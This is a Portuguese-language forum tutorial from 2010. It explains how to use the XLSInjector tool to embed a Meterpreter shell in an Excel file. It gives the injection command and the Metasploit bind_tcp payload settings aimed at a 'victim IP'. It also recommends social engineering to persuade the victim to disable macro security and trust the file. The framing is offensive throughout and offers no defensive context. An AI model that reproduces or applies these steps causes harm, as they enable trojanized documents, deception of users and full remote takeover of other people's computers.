Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

XLSInjector - Saiba como injetar um Shell Meterpreter em arquivos Excel

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tutorial XLSInjector - Saiba como injetar um Shell Meterpreter em arquivos Excel

    Não é um segredo para ninguém que a suíte de programas para escritório mais utilizada no mundo é o Microsoft Office, possuindo a maior fatia do mercado em sistemas operacionais Windows e Mac. Desta suíte, os programas mais utilizados são Microsoft Word, Microsoft Excel e Microsoft Power Point, que quase sempre estão instalados na maioria dos computadores.

    Nesse artigo do XLSInjector, uma ferramenta criada por Keith Lee que permite injetar em um arquivo do Microsoft Excel um console meterpreter (executado totalmente na memória ram, sem criar nenhum processo adicional), permitindo-nos acessar o mesmo remotamente a partir da porta 4444 e ganhar controle total da máquina.

    Para que o XLSInjector funcione adequadamente, precisamos do seguinte ambiente configurado:

    * Uma máquina (virtual ou real) com Windows
    * Microsoft Excel
    * Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    * Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    * Um arquivo XLS para infectar
    * Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    * Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Depois de configurar todos os elementos necessários para o correto funcionamento do XLSInjector, passamos para a execução, que é bem simples:

    # perl xlsinjector.pl -i ArquivoDoExcel.xls -o ArquivoComShellDoExcel.xls

    Mas nem tudo é tão simples com essa ferramenta, pois o XLSInjector NÃO consegue burlar os filtros de scripts existentes na suíte Microsoft e, justo por isso, é necessário convencer, por meio de engenharia social, ou qualquer outra técnica, que o usuário desabilite as configurações de segurança de macros e que "confie" no arquivo, o que é um pouco complicado, mas que certamente com um pouco de persuasão é possível conseguir.

    Supondo que já realizou as configurações necessárias para o correto funcionamento do XLSInjector, vamos acessar remotamente nossa shell meterpreter através do console do Metasploit Framework.

    Iniciamos o console do Metasploit:

    # ./msfconsole

    Uma vez que o console MSF esteja aberto, carregamos o payload do meterpreter:

    set payload windows/meterpreter/bind_tcp

    Configuramos o payload corretamente, com seus parâmetros:

    set RHOST ip_da_vitima
    set RPOT 4444
    E executamos:

    exploit

    Com esses passos simples temos à nossa disposição uma shell meterpreter na máquina remota. Temos que ter em mente que uma shell meterpreter é diferente de uma shell de um sistema operacional, e que possui seu próprio conjunto de comando, que pode ser listado simplesmente digitando na shell "?" e pressionando enter. Com esse comando, terá em sua tela algo parecido com isso:




    Autor: Luiz Vieira
    Last edited by praTes; 24-07-2010, 20:03.

X
Working...
X